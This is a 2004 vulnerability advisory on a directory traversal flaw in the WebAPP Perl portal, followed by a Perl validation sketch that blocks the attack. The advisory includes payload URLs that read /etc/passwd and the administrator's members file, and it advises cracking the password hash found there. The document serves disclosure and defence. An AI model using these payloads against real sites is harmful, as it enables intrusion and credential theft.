WebAPP Multiple Vulnerabilities
25 August 2004
From: "Jérôme" ATHIAS <jerome.athias(At)caramail.com>

WebAPP is advertised as the internet's most feature-rich, easy-to-run Perl-based portal system. Its home site is at http://www.web-app.org/. Some features are:

-Easy to Install on standard Unix servers! (Windows user-supported only!)
-User Profiles
-Message forums
-Private messaging between members
-Blog-style News Articles
-Links and Downloads
-Customizable themes
-Multiple language support
-Flat-file System-NO SQL DATABASE!
-Membership controls
-Open source

Several user mods are also available, which range from chat to e-commerce applications.

Several vulnerabilities in these mods have already been discovered.

The WebAPP system itself has a serious reverse directory traversal vulnerability.

Example:

1) Go to http://vulnerable-target.xxx/cgi-bin/index.cgi
/this is their main support site/

2) Click on Articles on the main menu at the left side of the screen

3) Click on any of the icons representing the misc topics available /I chose the "bugs" section/

4) You'll wind up with the URL
"http://vulnerable-target.xxx/cgi-bin/index.cgi?action=topics&viewcat=bugs"
in the address bar of your browser. Change it to
"http://vulnerable-target.xxx/cgi-bin/index.cgi?action=topics&viewcat=../../../../../../../etc/passwd%00"

5) View the HTML source for the page

A more interesting file to look at would be:
"http://vulnerable-target.xxx/cgi-bin/index.cgi?action=topics&viewcat=../../db/members/admin.dat%00"

View the HTML source code and scroll down until you come to the line with:
href="index.cgi?action=viewnews&amp;id=adUCOOzV2ljgg"></a></td>

"adUCOOzV2ljgg" is the hashed password of the Administrator.
It's standard DES encrypted, so you can run a password cracking program to crack it.

Every user has a corresponding .dat file within the db/members directory.

PhTeam Release

Greetz to PATz, Luvchr|s, Verum, Fed-X, rebarz99, hEps, ch1m3ra, and the jerk posers in #oneball
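
The traversal above works because the `viewcat` value reaches a file path unchecked. The following Perl sketch shows one way a CGI handler can validate such a parameter; it is an added example, not WebAPP's code, and the function name `safe_topic_path`, the topics directory and the `.cat` suffix are assumptions.

```perl
use strict;
use warnings;
use Cwd qw(realpath);
use File::Spec;
use File::Temp qw(tempdir);

# Hypothetical helper: return the absolute path of the topic file for
# $viewcat, or nothing if the value is not a plain category name.
sub safe_topic_path {
    my ($base_dir, $viewcat) = @_;
    return unless defined $viewcat;

    # Allowlist: letters, digits, underscore and hyphen only. This rejects
    # "/", "..", and the NUL byte that a decoded %00 leaves in the value
    # (the NUL would otherwise cut off the assumed ".cat" suffix at open()).
    return unless $viewcat =~ /\A[A-Za-z0-9_-]{1,64}\z/;

    my $base = realpath($base_dir);
    return unless defined $base;
    my $candidate = File::Spec->catfile($base, "$viewcat.cat");

    # Defence in depth: resolve symlinks and confirm containment.
    my $real = realpath($candidate);
    return unless defined $real && -f $real;
    return unless index($real, "$base/") == 0;
    return $real;
}

# Constructed demo data: a temporary topics directory with one category.
my $topics = tempdir(CLEANUP => 1);
open(my $fh, '>', File::Spec->catfile($topics, 'bugs.cat')) or die $!;
print {$fh} "sample topic list\n";
close($fh);

# Values as they would arrive after the CGI layer has URL-decoded them.
my @inputs = (
    'bugs',
    "../../../../../../../etc/passwd\0",
    "../../db/members/admin.dat\0",
    'bugs/../bugs',
    '',
);
for my $v (@inputs) {
    (my $shown = $v) =~ s/\0/%00/g;
    my $path = safe_topic_path($topics, $v);
    printf "%-45s %s\n", "viewcat=$shown", defined $path ? "ALLOW" : "REJECT";
}
```

Only `viewcat=bugs` is allowed; both URLs from the advisory and the other malformed values are rejected before any file is opened.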


COPYRIGHT 1998-2014 BY HELP NET SECURITY.